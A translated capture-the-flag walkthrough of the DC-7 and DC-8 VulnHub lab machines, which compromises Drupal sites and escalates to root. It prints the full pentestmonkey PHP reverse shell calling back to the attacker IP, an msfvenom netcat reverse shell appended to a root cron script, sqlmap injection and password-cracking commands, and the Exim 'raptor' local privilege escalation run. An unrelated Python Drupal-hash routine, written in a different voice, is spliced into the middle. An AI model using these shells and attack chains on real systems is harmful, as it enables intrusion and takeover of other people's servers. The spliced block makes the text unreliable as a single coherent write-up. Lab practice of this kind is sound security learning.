Penetration Testing Practice: DC-7 and DC-8 Target Machines


Preface

As a newcomer just starting out in penetration testing, I followed write-ups by more experienced people, worked through the DC-7 and DC-8 machines myself, and am sharing my own write-up here.

I am still learning; if there are mistakes or better approaches, criticism and pointers are very welcome. Thanks!

Because the network environment changed during the exercise, the attacker and target IPs may differ between sections. Where they do, the environment list at the start of the section gives both.

 

DC-7

Environment

VM platform: VMware Workstation Pro

Attacker: Kali (IP: 192.168.43.84)

Target: DC-7 (IP: 192.168.43.29)

Penetration test

An nmap scan of the target IP shows ports 22 and 80 open:

root@Knlvre:~# nmap -p- -A 192.168.43.29
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-27 09:36 CST
Nmap scan report for bogon (192.168.43.29)
Host is up (0.0035s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 d0:02:e9:c7:5d:95:32:ab:10:99:89:84:34:3d:1e:f9 (RSA)
|   256 d0:d6:40:35:a7:34:a9:0a:79:34:ee:a9:6a:dd:f4:8f (ECDSA)
|_  256 a8:55:d5:76:93:ed:4f:6f:f1:f7:a1:84:2f:af:bb:e1 (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-generator: Drupal 8 (https://www.drupal.org)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/ 
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/ 
| /user/password/ /user/login/ /user/logout/ /index.php/admin/ 
|_/index.php/comment/reply/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Welcome to DC-7 | D7
MAC Address: 00:0C:29:BB:F1:42 (VMware)
Device type: general purpose

Port 80 serves a Drupal site. My first thought was Metasploit: I searched for drupal modules and tried several of the newest ones, but none of them got a shell. So back to the web page for hints.

[Figure 7-1]

Welcome to DC-7

DC-7 introduces some “new” concepts, but I’ll leave you to figure out what they are. 🙂

While this challenge isn’t all that technical, if you need to resort to brute forcing or a dictionary attacks, you probably won’t succeed.

What you will have to do, is to think “outside” the box.

Way “outside” the box. 🙂

Note the hint "outside" and the DC7USER at the bottom of the page. Searching Twitter for that user turns up an account with a link: https://github.com/Dc7User. I do not have a Twitter account, so the screenshot below is borrowed from someone else.

[Figure 7-2]

Opening that link shows a repository called stuffdbphp.

[Figure 7-3]

Inside, there is a note:

This is some “code” (yes, it’s not the greatest code, but that wasn’t the point) for the DC-7 challenge.

This isn’t a flag, btw, but if you have made it here, well done anyway. 🙂

login.php itself contains no credentials, but it includes config.php, and that file holds a database username and password:

<?php 
    $servername = "localhost"; 
    $username = "dc7user"; 
    $password = "MdR3xOgB7#dW"; 
    $dbname = "Staff"; 
    $conn = mysqli_connect($servername, $username, $password, $dbname); 
?>

With those credentials in hand, and remembering that the scan showed port 22 open, I tried them over SSH, and they worked:

 fingerprint is SHA256:J5aG8w2iY0G0Nh3p4L+WzXXaQ7O1GjFTlfAYwkBIbM4.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.43.29' (ECDSA) to the list of known hosts.
dc7user@192.168.43.29's password: 
Linux dc-7 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u5 (2019-08-11) x86_64
...
dc7user@dc-7:~$ id
uid=1000(dc7user) gid=1000(dc7user) groups=1000(dc7user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)

Listing the home directory shows a mailbox file, mbox:

dc7user@dc-7:~$ ls
backups  mbox
dc7user@dc-7:~$ cat mbox
...
From root@dc-7 Fri Aug 30 03:15:17 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 30 Aug 2019 03:15:17 +1000
Received: from root by dc-7 with local (Exim 4.89)
    (envelope-from <root@dc-7>)
    id 1i3O0y-0000Ed-To
    for root@dc-7; Fri, 30 Aug 2019 03:15:17 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3O0y-0000Ed-To@dc-7>
Date: Fri, 30 Aug 2019 03:15:17 +1000

rm: cannot remove '/home/dc7user/backups/*': No such file or directory
Database dump saved to /home/dc7user/backups/website.sql               [success]
...

At first I looked at backups/website.sql, but it is a GPG-encrypted file, so I set it aside. The mail subject, Cron <root@dc-7> /opt/scripts/backups.sh, points at the script itself:

dc7user@dc-7:/opt/scripts$ cat backups.sh 
#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz

Note the drush command: it is Drupal's command-line administration tool, and among other things it can change a user's password, in this form:

drush user-password admin --password="new_pass"

Change into /var/www/html and use drush to reset the admin password; it succeeds:

dc7user@dc-7:/opt/scripts$ cd /var/www/html
dc7user@dc-7:/var/www/html$ drush user-password admin --password="123456"
Changed password for admin

Back in the browser, logging in as admin works.

[Figure 7-4]

Once in, go to Manage -> Extend -> List -> Install new module to reach the module installation page.

[Figure 7-5]

Download the module php-8.x-1.0.tar.gz from the page below, then click Install to upload it to the target:

https://www.drupal.org/project/php

[Figure 7-6]

On the upload-success page, click Enable newly added modules to activate it.

[Figure 7-7]

Open the FILTERS tab, tick PHP Filter, then click Install at the bottom.

[Figure 7-8]

Now return to the home page and, in the Tools bar on the left, click Add content -> Basic page.

In the Body field, paste a reverse shell:

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  The author accepts no liability
// for damage caused by this tool.  If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.43.84';  // CHANGE THIS
$port = 3737;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
    // Fork and have the parent process exit
    $pid = pcntl_fork();

    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }

    if ($pid) {
        exit(0);  // Parent exits
    }

    // Make the current process a session leader
    // Will only succeed if we forked
    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }

    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
    // Check for end of TCP connection
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }

    // Check for end of STDOUT
    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }

    // Wait until a command is end down $sock, or some
    // command output is available on STDOUT or STDERR
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    // If we can read from the TCP socket, send
    // data to process's STDIN
    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }

    // If we can read from the process's STDOUT
    // send data down tcp connection
    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }

    // If we can read from the process's STDERR
    // send data down tcp connection
    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
    if (!$daemon) {
        print "$string\n";
    }
}

?>

Start a listener locally, then click Preview; the shell connects back:

root@Knlvre:~# nc -lvnp 3737
listening on [any] 3737 ...
connect to [192.168.43.84] from (UNKNOWN) [192.168.43.29] 60104
Linux dc-7 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u5 (2019-08-11) x86_64 GNU/Linux
 13:28:32 up  2:52,  1 user,  load average: 0.01, 0.06, 0.03
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
dc7user  pts/0    192.168.43.84    12:33   34:56   0.25s  0.25s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off

$ python -c "import pty;pty.spawn('/bin/bash')"

www-data@dc-7:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

After confirming there is nothing else useful, check the permissions on the backups.sh script from earlier:

www-data@dc-7:/opt/scripts$ ls -l
-rwxrwxr-x 1 root www-data 520 Aug 29 23:02 backups.sh

The file is owned by root, but its group is www-data and the group bits are rwx, so our current www-data user has full (r, w, x) access to a script that root's cron job runs.

That write permission is enough to escalate. Using msfvenom, run the following on Kali:

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.43.84 lport=7373 R

After a moment, msfvenom returns a one-line command:

root@Knlvre:~# msfvenom -p cmd/unix/reverse_netcat lhost=192.168.43.84 lport=7373
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 91 bytes
mkfifo /tmp/bqro; nc 192.168.43.84 7373 0</tmp/bqro | /bin/sh >/tmp/bqro 2>&1; rm /tmp/bqro

Listen on port 7373 with nc:

root@Knlvre:~# nc -lvnp 7373
listening on [any] 7373 ...

Then copy the last line of the msfvenom output, wrap it in quotes, prefix it with echo and append >> backups.sh. Run the resulting command in the target shell obtained earlier; after that there is nothing to do but wait for the cron job to connect back:

echo "mkfifo /tmp/bqro; nc 192.168.43.84 7373 0</tmp/bqro | /bin/sh >/tmp/bqro 2>&1; rm /tmp/bqro" >> backups.sh

A root shell comes back almost immediately, and the flag is ours:

root@Knlvre:~# nc -lvnp 7373
listening on [any] 7373 ...
connect to [192.168.43.84] from (UNKNOWN) [192.168.43.29] 55244
id
uid=0(root) gid=0(root) groups=0(root)


cd /root
ls
theflag.txt
cat theflag.txt

888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-7.  Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.

I'm sending out an especially big thanks to:

@4nqr34z
@D4mianWayne
@0xmzfr
@theart42

If you enjoyed this CTF, send me a tweet via @DCAU7.

 

DC-8

Environment

VM platform: VMware Workstation Pro

Attacker: Kali (IP: 192.168.43.84 or 192.168.0.111)

Target: DC-8 (IP: 192.168.43.165 or 192.168.0.112)

Penetration test

An nmap scan shows ports 22 and 80 open; port 80 is again a Drupal site.

Clicking the Details entries on the left, the nid parameter in the URL changes.

[Figure 8-1]

Adding a single quote produces an error that echoes the executed SQL statement; the injection is in an integer parameter.

[Figure 8-2]

Running sqlmap enumerates the databases straight away:

sqlmap -u http://192.168.43.165/?nid=1 --dbs --batch

d7db
information_schema

sqlmap -u http://192.168.43.165/?nid=1 -D d7db --tables --batch

users

users_roles

Dump the users table to get the admin password hash (john's comes out too):

sqlmap -u http://192.168.43.165/?nid=1 -D d7db -T users --dump --batch
uid name pass
1 admin $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
2 john $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

Crack the hashes with john (admin's did not crack; john's did):

# vi password_dc8.txt
# paste in $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
# john password_dc8.txt

root@Knlvre:~# vi password_dc8.txt 
root@Knlvre:~# john password_dc8.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Drupal7, $S$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 32768 for all loaded hashes
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
turtle           (?)
1g 0:00:00:11 DONE 2/3 (2019-09-27 16:09) 0.08912g/s 99.10p/s 99.10c/s 99.10C/s tucker..utopia
Use the "--show" option to display all of the cracked passwords reliably
Session completed
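The $S$ hashes above are Drupal 7's iterated SHA-512 scheme, which john identified and whose cost it printed as 32768. As an added example (my own code, not taken from the write-up or from Drupal), here is a Python re-implementation of that scheme that parses the setting prefix, recomputes the hash and verifies a candidate password against the john hash dumped above; the random-salt helper is an assumption about how a fresh salt is drawn, not Drupal's exact routine.

```python
from __future__ import annotations

import hashlib
import hmac
import os

# Drupal 7's phpass-style alphabet; the 4th char of a hash encodes log2(iterations).
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55            # stored hashes are truncated to 55 chars
MIN_LOG2, MAX_LOG2 = 7, 30  # iteration exponents Drupal 7 accepts

# Hash dumped from the DC-8 users table above (user john).
JOHN_HASH = "$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF"

def _b64_encode(data: bytes) -> str:
    """phpass base64 variant: 6-bit groups taken low bits first, no padding."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)

def iterations(stored: str) -> int:
    """Iteration count from the prefix char ('D' -> 2^15); john prints it as 'Cost 1'."""
    return 1 << ITOA64.index(stored[3])

def drupal7_crypt(password: str, setting: str) -> str | None:
    """Recompute a $S$ hash from the 12-char setting ($S$, log2 char, 8-char salt)."""
    setting = setting[:12]
    if len(setting) != 12 or not setting.startswith("$S$"):
        return None
    count_log2 = ITOA64.find(setting[3])
    if not MIN_LOG2 <= count_log2 <= MAX_LOG2:
        return None
    salt, pw = setting[4:].encode(), password.encode()
    digest = hashlib.sha512(salt + pw).digest()
    for _ in range(1 << count_log2):
        digest = hashlib.sha512(digest + pw).digest()
    return (setting + _b64_encode(digest))[:HASH_LENGTH]

def drupal7_verify(password: str, stored: str) -> bool:
    """Constant-time check of a candidate password against a stored $S$ hash."""
    computed = drupal7_crypt(password, stored)
    return computed is not None and hmac.compare_digest(computed, stored)

def drupal7_hash(password: str, count_log2: int = 15) -> str:
    """New hash with a random 8-char salt (assumed salt derivation, same output format)."""
    salt = "".join(ITOA64[b & 0x3F] for b in os.urandom(8))
    return drupal7_crypt(password, "$S$" + ITOA64[count_log2] + salt)
```

The exponent in the prefix is the only cost knob: a site that still stores hashes with a low prefix character is cheaper to attack than the 32768-round default seen here.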

A dirsearch scan finds the login path /user, and logging in as john succeeds. Click Contact Us at the top, then Webform -> form settings, choose PHP code, and paste in the reverse shell used earlier (note: put an arbitrary string before the shell, and remember to update the address and port), then submit.

[Figure 8-3]

Start the listener first:

root@Knlvre:~# nc -lvnp 3737
listening on [any] 3737 ...

Then go back to the Contact Us page, fill in the fields with anything, and submit.

[Figure 8-4]

Back in the terminal, the shell has arrived. Search for SUID binaries:

$ python -c "import pty;pty.spawn('/bin/bash')"

www-data@dc-8:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

www-data@dc-8:/$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/sbin/exim4
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/ping
/bin/su
/bin/umount
/bin/mount

Note exim4; that is the privilege escalation route. Check its version:

www-data@dc-8:/$ exim4 --version | head -1
Exim version 4.89 #2 built 14-Jun-2017 05:03:07

Searching Exploit Database for exim turns up this entry: https://www.exploit-db.com/exploits/46996

www-data cannot write to the current directory, so switch to /tmp, which is world-writable:

www-data@dc-8:/$ ls -l
...
drwxr-xr-x   2 root root  4096 Sep  5 00:23 srv
dr-xr-xr-x  13 root root     0 Sep 30 01:45 sys
drwxrwxrwt   2 root root  4096 Oct  1 07:42 tmp
drwxr-xr-x  10 root root  4096 Sep  5 00:23 usr
drwxr-xr-x  12 root root  4096 Sep  5 00:32 var
...

You can wget it directly from that address, or download it to Kali and serve it from a temporary web server to fetch onto the target. But when I ran it with ./ it kept failing:

[Figure 8-5]

www-data@dc-8:/tmp$ wget http://192.168.0.111:7373/46996.sh
--2019-10-01 08:16:21--  http://192.168.0.111:7373/46996.sh
Connecting to 192.168.0.111:7373... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3706 (3.6K) [text/x-sh]
Saving to: '46996.sh'

46996.sh            100%[===================>]   3.62K  --.-KB/s    in 0s      

2019-10-01 08:16:21 (28.9 MB/s) - '46996.sh' saved [3706/3706]

www-data@dc-8:/tmp$ ls
46996.sh

www-data@dc-8:/tmp$ chmod 777 46996.sh

www-data@dc-8:/tmp$ ./46996.sh
bash: ./46996.sh: /bin/bash^M: bad interpreter: No such file or directory

The ^M in the error means the downloaded file has Windows CRLF line endings. So instead I wrote the file directly with vi: click the spot shown below, copy the raw content, create a new file on the target and paste it in.

[Figure 8-6]

www-data@dc-8:/tmp$ ls
raptor_exim_wiz.sh

www-data@dc-8:/tmp$ vi raptor_exim_wiz.sh    # paste the script in

www-data@dc-8:/tmp$ ls
raptor_exim_wiz.sh

www-data@dc-8:/tmp$ chmod 777 raptor_exim_wiz.sh

According to the Usage section in the script, there are two ways to run it:

# Usage (setuid method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m setuid
# Preparing setuid shell helper...
# Delivering setuid payload...
# [...]
# Waiting 5 seconds...
# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned
# # id
# uid=0(root) gid=0(root) groups=0(root)
#
# Usage (netcat method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m netcat
# Delivering netcat payload...
# Waiting 5 seconds...
# localhost [127.0.0.1] 31337 (?) open
# id
# uid=0(root) gid=0(root) groups=0(root)

The first method (setuid) failed to escalate:

www-data@dc-8:/tmp$ ./raptor_exim_wiz.sh -m setuid
./raptor_exim_wiz.sh -m setuid
./raptor_exim_wiz.sh: line 1: m_wiz: command not found

raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>

Preparing setuid shell helper...
Problems compiling setuid shell helper, check your gcc.
Falling back to the /bin/sh method.

Delivering setuid payload...
220 dc-8 ESMTP Exim 4.89 Tue, 01 Oct 2019 08:26:09 +1000
250 dc-8 Hello localhost [::1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1iF47N-0000O7-Uz
221 dc-8 closing connection

Waiting 5 seconds...
-rwxr-xr-x 1 www-data www-data 117208 Oct  1 08:26 /tmp/pwned
$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

The second method (netcat) succeeded and gave root directly; the flag follows.

PS: the shell could of course also be sent back to Kali here.

www-data@dc-8:/tmp$ ./raptor_exim_wiz.sh -m netcat
./raptor_exim_wiz.sh -m netcat
./raptor_exim_wiz.sh: line 1: m_wiz: command not found

raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>

Delivering netcat payload...
220 dc-8 ESMTP Exim 4.89 Tue, 01 Oct 2019 08:27:59 +1000
250 dc-8 Hello localhost [::1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1iF499-0000Oj-KW
221 dc-8 closing connection

Waiting 5 seconds...
localhost [127.0.0.1] 31337 (?) open

id
uid=0(root) gid=113(Debian-exim) groups=113(Debian-exim)

cd /root

ls
flag.txt

cat flag.txt

Brilliant - you have succeeded!!!



888       888          888 888      8888888b.                             888 888 888 888
888   o   888          888 888      888  "Y88b                            888 888 888 888
888  d8b  888          888 888      888    888                            888 888 888 888
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888



Hope you enjoyed DC-8.  Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.

I'm also sending out an especially big thanks to:

@4nqr34z
@D4mianWayne
@0xmzfr
@theart42

This challenge was largely based on two things:

1. A Tweet that I came across from someone asking about 2FA on a Linux box, and whether it was worthwhile.
2. A suggestion from @theart42

The answer to that question is...

If you enjoyed this CTF, send me a tweet via @DCAU7.

 

References

https://www.hackingarticles.in/dc7-vulnhub-walkthrough/

https://www.hackingarticles.in/dc8-vulnhub-walkthrough/
